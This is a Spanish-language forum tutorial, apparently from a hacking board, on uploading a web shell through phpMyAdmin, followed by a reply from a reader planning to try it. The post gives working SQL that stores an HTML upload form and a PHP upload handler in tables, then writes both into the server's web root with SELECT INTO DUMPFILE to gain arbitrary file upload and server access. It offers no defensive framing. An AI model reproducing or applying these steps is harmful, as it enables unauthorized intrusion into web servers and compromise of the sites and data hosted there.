Hola gente, aquí les vengo a enseñar como subir una shell desde phpmyadmin:
1- Lo primero que debemos hacer es tener acceso al phpmyadmin.
2- Luego crear una base de datos dentro del phpmyadmin con el nombre que quieran.
3- Luego de que la base de datos este creada nos vamos a SQL y empezamos a poner los siguientes códigos:
El primero es este:
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;
Luego de haber hecho esto debemos dar a continuar y poner un nuevo código, que es este:
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;
Luego de haber hecho este segundo paso insertamos el nuevo código con los mismos pasos anteriores, que es este:
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload</title>
</head>
<body bgcolor="black">
<div style=" color:white;text-align:center; margin-top:60px; font-size:25px;
">Upload</div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>');
Luego de haber insertado el tercer código nos vamos a lo siguiente:
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform
Luego de haber hecho este paso insertaremos el siguiente código con los mismos pasos anteriores:
INSERT INTO user_upload
VALUES (
"<?php $uploaddir = 'C:/xampp/htdocs/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if
(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=black></br></br><div
align=center><font size=5 color=white>File uploaded successfully</font></body>'; } else { print '<body
bgcolor=black></br></br><div align=center><font size=5 color=red>Error when uploading the file</font></body>'; } ?> "
)
Ya hecho este penúltimo paso nos vamos al último código que nos dará el privilegio de subir la shell al directorio principal del servidor:
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload
Ya terminado todos estos pasos tendremos el privilegio de subir shell al directorio principal y tener acceso al servidor o host. Para dirigirnos al upload debemos ir a http://website.com/form.php y así podremos subir la shell.
Saludos.
Interesante BRO!
andaba buscando algo así, lo probaré y les cuento como me va.
Saludos!